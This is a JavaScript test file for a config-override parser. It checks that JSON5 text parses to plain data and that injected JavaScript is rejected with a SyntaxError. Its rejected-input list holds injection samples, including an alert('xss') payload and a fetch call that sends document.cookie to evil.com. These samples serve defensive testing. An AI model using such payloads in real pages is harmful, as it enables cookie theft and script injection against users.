parseConfigOverrides.test.mjs
/**
* Copyright (c) Meta Platforms, Inc. and affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
import assert from 'node:assert';
import {test, describe} from 'node:test';
import JSON5 from 'json5';
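// Re-implement parseConfigOverrides here since the source uses TS imports
// that can't be directly loaded by Node. This mirrors the logic in
// compilation.ts exactly. These tests exercise this copy, not the shipped
// function, so the two must be kept in sync by hand.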
/**
 * Turn the user-supplied config-overrides text into a value.
 *
 * The text is handed to JSON5.parse, which is a data parser: input that is
 * JavaScript rather than JSON5 data makes it throw instead of being run.
 * The parsed value is returned as-is; nothing here checks that it is an
 * object or that its keys are known options.
 *
 * @param {string} configOverrides - Raw override text; may be blank.
 * @returns {*} `{}` for blank input, otherwise whatever JSON5.parse yields.
 * @throws Whatever JSON5.parse throws for text that is not valid JSON5.
 */
function parseConfigOverrides(configOverrides) {
  const text = configOverrides.trim();
  // Blank (or whitespace-only) input means "no overrides".
  return text === '' ? {} : JSON5.parse(text);
}
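// Tests for parseConfigOverrides: JSON5 config text must parse to plain data,
// and text that is JavaScript rather than JSON5 data must be refused by the
// parser instead of being evaluated.
describe('parseConfigOverrides', () => {
  test('empty string returns empty object', () => {
    assert.deepStrictEqual(parseConfigOverrides(''), {});
    assert.deepStrictEqual(parseConfigOverrides(' '), {});
  });

  test('default config parses correctly', () => {
    const config = `{
//compilationMode: "all"
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {});
  });

  test('compilationMode "all" parses correctly', () => {
    const config = `{
compilationMode: "all"
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {compilationMode: 'all'});
  });

  test('config with single-line and block comments parses correctly', () => {
    const config = `{
// This is a single-line comment
/* This is a block comment */
compilationMode: "all",
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {compilationMode: 'all'});
  });

  test('config with trailing commas parses correctly', () => {
    const config = `{
compilationMode: "all",
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {compilationMode: 'all'});
  });

  test('nested environment options parse correctly', () => {
    const config = `{
environment: {
validateRefAccessDuringRender: true,
},
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {
      environment: {validateRefAccessDuringRender: true},
    });
  });

  test('multiple options parse correctly', () => {
    const config = `{
compilationMode: "all",
environment: {
validateRefAccessDuringRender: false,
},
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {
      compilationMode: 'all',
      environment: {validateRefAccessDuringRender: false},
    });
  });

  // Inputs that are JavaScript expressions, not JSON5 data. Each must be
  // refused by the parser. The expected error class is pinned to SyntaxError
  // (what JSON5.parse raises for invalid input) because a bare assert.throws
  // would also pass on an unrelated failure such as a TypeError or a
  // ReferenceError, hiding a regression in the parsing path.
  const rejectedInputs = [
    [
      'rejects malicious IIFE injection',
      `(function(){ document.title = "hacked"; return {}; })()`,
    ],
    [
      'rejects malicious comma operator injection',
      `{
compilationMode: (alert("xss"), "all")
}`,
    ],
    [
      'rejects function call in value',
      `{
compilationMode: eval("all")
}`,
    ],
    [
      'rejects variable references',
      `{
compilationMode: someVar
}`,
    ],
    [
      'rejects template literals',
      `{
compilationMode: \`all\`
}`,
    ],
    [
      'rejects constructor calls',
      `{
compilationMode: new String("all")
}`,
    ],
    [
      'rejects arbitrary JS code',
      `fetch("https://evil.com?c=" + document.cookie)`,
    ],
  ];

  for (const [title, config] of rejectedInputs) {
    test(title, () => {
      assert.throws(() => parseConfigOverrides(config), SyntaxError);
    });
  }

  test('config with array values parses correctly', () => {
    const config = `{
sources: ["src/a.ts", "src/b.ts"],
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {sources: ['src/a.ts', 'src/b.ts']});
  });

  test('config with null values parses correctly', () => {
    const config = `{
compilationMode: null,
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {compilationMode: null});
  });

  test('config with numeric values parses correctly', () => {
    const config = `{
maxLevel: 42,
}`;
    const result = parseConfigOverrides(config);
    assert.deepStrictEqual(result, {maxLevel: 42});
  });
});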